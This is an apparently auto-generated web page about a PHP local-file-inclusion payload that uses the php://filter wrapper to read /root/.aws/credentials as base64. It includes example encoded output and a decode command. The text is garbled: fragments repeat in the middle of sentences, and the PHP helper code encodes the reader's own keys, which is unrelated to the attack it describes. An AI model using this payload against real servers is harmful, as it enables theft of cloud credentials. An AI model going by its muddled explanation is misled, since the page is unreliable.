-view-php-3a-2f-2ffilter-2fread-3dconvert.base64 Encode-2fresource-3d-2froot-2f.aws-2fcredentials Online
If you are authorized to test a web application, you can replicate this attack:
First, you need to encode your AWS credentials (Access Key ID and Secret Access Key) using base64. This can be done using an online base64 encoding tool or programmatically.
function encodeCredentials($accessKeyId, $secretAccessKey)
$credentials = $accessKeyId . ':' . $secretAccessKey;
$encodedCredentials = base64_encode($credentials);
return $encodedCredentials;
// Example usage:
$accessKeyId = 'YOUR_ACCESS_KEY_ID';
$secretAccessKey = 'YOUR_SECRET_ACCESS_KEY';
$encodedCredentials = encodeCredentials($accessKeyId, $secretAccessKey);
echo "Encoded Credentials: $encodedCredentials\n";
You might ask: why not just read the file as plaintext? Because the file typically contains newlines, special characters, and PHP might parse or corrupt binary data. Base64 encoding ensures a clean, readable string that can be copied and decoded offline. If you are authorized to test a web
Example output when the attack succeeds:
W2RlZmF1bHRdCmF3c19hY2Nlc3Nfa2V5X2lkID0gQUtJQUlPU0ZPRE5ON0VYQU1QTEUKYXdzX3NlY3JldF9hY2Nlc3Nfa2V5ID0gd0phbHJYVXRuRkVNSS9LN01ERU5HL2JQWnhmaUNZRVhBTVBMRUtFWQo=
Decode it with:
echo "W2RlZmF1bHRd..." | base64 -d
And you get the plaintext credentials.
php://filter:
This is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is often used by developers to handle data transformation (like converting characters to uppercase or lowercase) during file reads. First, you need to encode your AWS credentials
read=convert.base64-encode:
This is the filter being applied. It instructs PHP to read the file and encode its contents using Base64.
resource=/root/.aws/credentials:
This specifies the target file on the server. You might ask: why not just read the file as plaintext
function base64Encode($data)
return base64_encode($data);